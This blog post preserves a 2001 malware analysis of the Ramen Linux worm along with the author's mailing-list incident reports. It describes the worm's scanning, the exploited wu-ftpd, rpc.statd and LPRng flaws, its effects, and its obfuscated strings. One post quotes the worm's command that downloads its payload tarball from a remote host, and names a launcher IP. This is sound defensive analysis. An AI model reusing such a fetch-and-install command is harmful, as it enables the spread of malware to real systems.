Analiza Ramen Worm

In 2001 am prins , analizat , disecat primul malware de linux cu autoreplicare ce a primit numele de Ramen Worm. La vremea respectiva au aparut articole in toate publicatiile online majore. Aceasta analiza este pastrata aici din motive istorice in primul rind.

Ramen Worm - General Details
==============================

1. Is this realy a worm ?
Yes it is .
2. Why ?
It has multiplication ability and it does not infect executables file in order
to multiplicate so it can not be considered a Virus .
3. Multiplication technique :
It will scan whole networks ( random B class networks XXX.XXX.0.0/255.255.0.0 in order find vulnerable systems.
Once a vulnerable system is found it will take control of it ( the worm will have root access on compromised machine) ,
copy itself to the target , and start scanning .

4. Vulnerabilities exploited by the worm
wu-ftpd version 2.6.0
LPRng format vulnerability
rpc.statd    vulnerability

5. Systems Affected
Strings found in the worm indicates that the following systems are targeted :
Redhat 6.0 - (knfsd-1.2.2-4)
Redhat 6.1 - (knfsd-1.4.7-7)
Redhat 6.2 - (nfs-utils-0.1.6-2)
RedHat 7.0 - Guinesss-dev
RedHat 7.0 - Guinesss
but can be affected any other linux running wu-ftpd 2.6.0 or rpc.statd

6.   Systems that are not affected
Win 9x , Win NT , Win 2000
Non X86 Unixes.

7. Worm effects
a) Once a system is compromised the worm will find and replace any index.html file with one file carried inside worm .
b) it will disable on compromised machine FTP anonymous access to the machine ( my oppinion this is a "bug" in the worm )
c) it will disable and erase rpc.statd from the compromised machine
d) it will disable and erase lpd deamon from the compromised machine so any printing on that machine will be impossibe .
e) it will modify inetd.conf on RedHat 6.x and xinetd.conf on RedHat 7.0 and install a fake webserver
on a non standard port (my oppinion it can contain also a buffer overflow exploitable
remotely. But i could't prove that yet). By installing this it allows the spread of the worm.
f) it will remove /etc/hosts.deny
g) it will modify /etc/rc.d/rc.sysinit allowing the worm to be started each time machine is rebooted .
h) it will send mail to the following addreses ( this 2 mail addreses and a password "bl3h" were encrypted in the worm )
   gb31337@hotmail.com
   gb31337@yahoo.com
i) Once worm starts scanning it will consume a large amount of your internet bandwidth. The scanning is verry fast due to
usage of synscan technique .
j) Once the system is rebooted it will restart scanning .

8. Spreading
The worm is spreading very fast due to his very fast Class B network scanning technique . On our network (10 Mb / sec)
the hub was in limitation and the whole bandwidth was consummed. It scanned 2 "B classes" in 15 minutes.

9. Danger
The worm itself seemns is dangerous due to network bandwith consumation , and due to posibility ( not proved yet ) of
remote accessing the compromised box by the worm author.

10. Percentage of boxes vulnerable
There are many boxes vulnerable. It is quite common that Redhat 6.2 or Redhat 7.0 to be installed "standard" making
them vulnerable to this worm. My estimation is that in a class B network worm will find at least 10-20 vulnerable boxes.

My Original postings to BugTraq:
================================

=================================================================================
=================================================================================

Subject:
  sunrpc / wu-ftpd worm ?
Date:
  Mon, 15 Jan 2001 22:41:50 +0200
From:
  Mihai Moldovanu mihaim AT PROFM dot RO
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS DOT COM
References:
  1

Cristian Dumitrescu wrote:

> Hey
> I've been experiencing the same kind of scans in the last 2 weeks, with
> increased density in the last days, from these ip addreses:
>
> 211.120.63.136
> 213.154.132.122
> 210.205.6.215
> 24.114.48.24
> 62.83.125.82
> 193.231.199.4
> 193.40.223.66
> 65.3.3.83
> 193.230.227.234
> > 24.26.121.156
> > 24.168.66.119
> > 64.31.226.156
> > 142.169.227.102
> > 193.226.15.15
> > 211.218.144.11

Same problems here :
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50

But the most interesting is :
130.111.148.69 wich seems to be a worm launcher site .
It will connect to the taget machine on 111 or 21 and will exploit the well
known
rpc.statd and wu-ftp 2.6.0 bug to
gain root on the remote machine.

The tar itself is downloaded from the that machine on port 27374 .

" lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz "

After a succesfull install it seems it will send a mail with the command :
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com account .

It seems that it has some sort of class B scanner and exploits for rpc.statd and
wu-ftpd

If anyone is interested in taking a deeper look in it mail me and i will send
the
.tgz  or you can get it from the site i mentioned above.

Best Regards,

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/
             http://www.slashdot.ro/

=================================================================================
=================================================================================

Subject:
  Re: anyone else seen an increase in sunrpc scans these days?
Date:
  Mon, 15 Jan 2001 14:40:16 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

Jason Lewis wrote:

> I couldn't find any of those addresses, but I have similar scans in my logs.
>
> 63.91.6.36
> 64.32.209.213
> 64.21.114.2
> 66.22.62.2
> 216.98.160.251

Yes . The same problem here . But not only 111 . 21 also.
We deployed a honnypot and waited to be compromised. It took 12 hours to be
compromised. I took it out of the network
and this is what i found on it :
It seemns like a worm that installs StatDXscan  ( Class B rpc.statd scanner) ,
wu-ftpd scanner , a modified t0rn rootkit along with Adore LKM rootkit , and
flood
tools : Sl2 , smurf5 , tojaned sshd running on port 48480 )
t0rnscan  has inside it the following string:  irc.webbernet.net:6667

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/
             http://www.developers.ro/

=================================================================================
=================================================================================
Subject:
  Ramen worm . More details on it. ( found a password and e-mails crypted inside it)
Date:
  Tue, 16 Jan 2001 22:19:30 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

I completed reverse engineering the ramen worm. There are 3 crypted text
messages in the worm :
2 are email addresses :
Decrypted: "gb31337@hotmail.com" ,  in executable ->  "fa20226?gnsl`hk-bnl"
Decrypted: "gb31337@yahoo.com" ,   in executable ->  "fa20226?x`gnn-bnl"
and a crypted password :
Decrypted "bl3h"  ,   in executable -> "ak2g"
This texts can be found in almost all ELF worm executables.
Crypting algorithm is verry easy.

For each characted in crypted text add 1 and you will obtain the plain text
i used the following C code to decrypt :

for (i= 0 ;i < strlen(text) ;i++) a[i] = a[i] +1;

The asp executable ( the one wich get's installed in /sbin/asp and serve
requests on 27374 )  has a strange getline function coded wich
seems to be specialy crafted to allow remote upload / execution of code .
Unfortunately I can't prove that function have a buffer
overflow in it .

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://www.tfm.ro
        http://linux.tfm.ro
        http://portal.tfm.ro
        http://www.slashdot.ro
Posted in Uncategorized.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.